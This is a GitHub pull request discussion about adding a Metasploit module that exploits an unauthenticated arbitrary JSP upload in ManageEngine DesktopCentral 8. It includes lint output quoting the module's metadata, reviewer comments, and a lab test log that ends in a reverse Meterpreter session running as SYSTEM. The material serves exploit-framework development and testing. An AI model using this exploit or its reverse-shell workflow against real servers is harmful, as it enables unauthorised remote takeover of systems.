Add DesktopCentral arbitrary file upload exploit.

[cartel0x27]

No description provided.

[jvazquez-r7]

Processing....

[jvazquez-r7]

Module isn't msftidy compliant, should be before continue:

$ tools/msftidy.rb modules/exploits/windows/http/desktopcentral_file_upload.rb 
modules/exploits/windows/http/desktopcentral_file_upload.rb - [WARNING] Module should not be marked executable
modules/exploits/windows/http/desktopcentral_file_upload.rb - [ERROR] Incorrect disclosure date format
modules/exploits/windows/http/desktopcentral_file_upload.rb:14 - [WARNING] Tabbed indent: "\tinclude Msf::Exploit::Remote::HttpClient\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:15 - [WARNING] Tabbed indent: "\tinclude Msf::Exploit::EXE\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:18 - [WARNING] Tabbed indent: "\tdef initialize(info = {})\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:19 - [WARNING] Tabbed indent: "\t\tsuper(update_info(info,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:20 - [WARNING] Tabbed indent: "\t\t\t'Name'           => 'DesktopCentral AgentLogUpload Arbitrary File Upload',\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:21 - [WARNING] Tabbed indent: "\t\t\t'Description'    => %q{\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:22 - [WARNING] Tabbed indent: "\t\t\t\t\tThis module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0 build 80286 or below..\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:23 - [WARNING] Tabbed indent: "\t\t\t\tA malicious user can upload a JSP file into the web root without authentication, leading to arbitrary code execution.\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:24 - [WARNING] Tabbed indent: "\t\t\t},\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:25 - [WARNING] Tabbed indent: "\t\t\t'Author'         =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:26 - [WARNING] Tabbed indent: "\t\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:27 - [WARNING] Tabbed indent: "\t\t\t\t\t'Thomas Hibbert' # thomas.hibbert@security-assessment.com\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:28 - [WARNING] Tabbed indent: "\t\t\t\t],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:29 - [WARNING] Tabbed indent: "\t\t\t'License'        => MSF_LICENSE,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:30 - [WARNING] Tabbed indent: "\t\t\t'References'     =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:31 - [WARNING] Tabbed indent: "\t\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:32 - [WARNING] Tabbed indent: "\t\t\t\t],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:33 - [WARNING] Tabbed indent: "\t\t\t'Payload'\t     =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:34 - [WARNING] Tabbed indent: "\t\t\t\t{\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:35 - [WARNING] Tabbed indent: "\t\t\t\t\t'BadChars' => \"\\x00\",\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:36 - [WARNING] Tabbed indent: "\t\t\t\t},\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:37 - [WARNING] Tabbed indent: "\t\t\t'Platform'       => 'win',\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:38 - [WARNING] Tabbed indent: "\t\t\t'Arch'\t\t     => ARCH_X86,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:39 - [WARNING] Tabbed indent: "\t\t\t'Targets'        =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:40 - [WARNING] Tabbed indent: "\t\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:41 - [WARNING] Tabbed indent: "\t\t\t\t\t[ 'Desktop Central server / Windows', {} ],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:43 - [WARNING] Tabbed indent: "\t\t\t\t],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:44 - [WARNING] Tabbed indent: "\t\t\t'DefaultTarget'  => 0,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:45 - [WARNING] Tabbed indent: "\t\t\t'DisclosureDate' => 'some point....'))\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:47 - [WARNING] Tabbed indent: "\t\tregister_options(\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:48 - [WARNING] Tabbed indent: "\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:50 - [WARNING] Tabbed indent: "\t\t\t], self.class)\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:51 - [WARNING] Tabbed indent: "\tend\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:52 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:61 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:68 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:74 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:78 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:81 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:84 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:86 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:89 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:95 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:102 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:110 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:116 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:118 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:120 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:131 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:135 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:138 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:144 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:147 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:152 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb - [WARNING] Module contains old license comment, use tools/dev/resplat.rb <filename>.

[jvazquez-r7]

Isn't there any reference :?

[jvazquez-r7]

msftidy still complains:

$ tools/msftidy.rb modules/exploits/windows/http/desktopcentral_file_upload.rb
modules/exploits/windows/http/desktopcentral_file_upload.rb:57 - [WARNING] Spaces at EOL

[jvazquez-r7]

The full module should follow the indentation standard described here: https://github.com/rapid7/metasploit-framework/wiki/Indentation-Standards

The important thing is: "Using two-space soft tabs" which translates as "one indent level == two-space soft tab" :)

[jvazquez-r7]

I've download the trial but it is build 80294 so the module isn't working because of the patch I guess. Do you know if DesktopCentral keeps a repository of old versions? Otherwise we'll need a pcap of the module working for verification. You can send it to msfdev[at]metasploit.com. Thanks!

[cartel0x27]

Hi,

There's a repository of old versions at
http://archives.manageengine.com/desktop-central/. 80292 should work.

GPG ID: 8BB3F67B651E52C81CC4BDEC3CA0319F6E9ECEBA

On 21 November 2013 04:21, Juan Vazquez notifications@github.com wrote:

I've download the trial but it is build 80294 so the module isn't working
because of the patch I guess. Do you know if DesktopCentral keeps a
repository of old versions? Otherwise we'll need a pcap of the module
working for verification. You can send it to msfdev[at]metasploit.com.
Thanks!

—
Reply to this email directly or view it on GitHubhttps://github.com//pull/2650#issuecomment-28897445
.

[jvazquez-r7]

cool, thank, you, testing!

[jvazquez-r7]

Tested successfully, thanks @pnegry !!!

Did some changes and clean up, you can see the final result here: 851cf6f

Please feel free to review and don't hesitate to ask if you have question :) Hope it's useful in order to make easier your other pull request :)

Test result:

msf exploit(desktopcentral_file_upload) > reload
[*] Reloading module...
check
msf exploit(desktopcentral_file_upload) > check

[*] Manage Desktop Central 8 build 80292 found
[+] The target is vulnerable.
msf exploit(desktopcentral_file_upload) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8020 - Uploading JSP to execute the payload
[*] 192.168.172.136:8020 - Executing payload
[*] Sending stage (769024 bytes) to 192.168.172.136
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.136:2433) at 2013-11-21 09:29:36 -0600
[+] Deleted ..\webapps\DesktopCentral\biutxffk.jsp
[!] This exploit may require manual cleanup of: jlejatqp.exe

meterpreter > getuid
dServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 4 closed.  Reason: User exit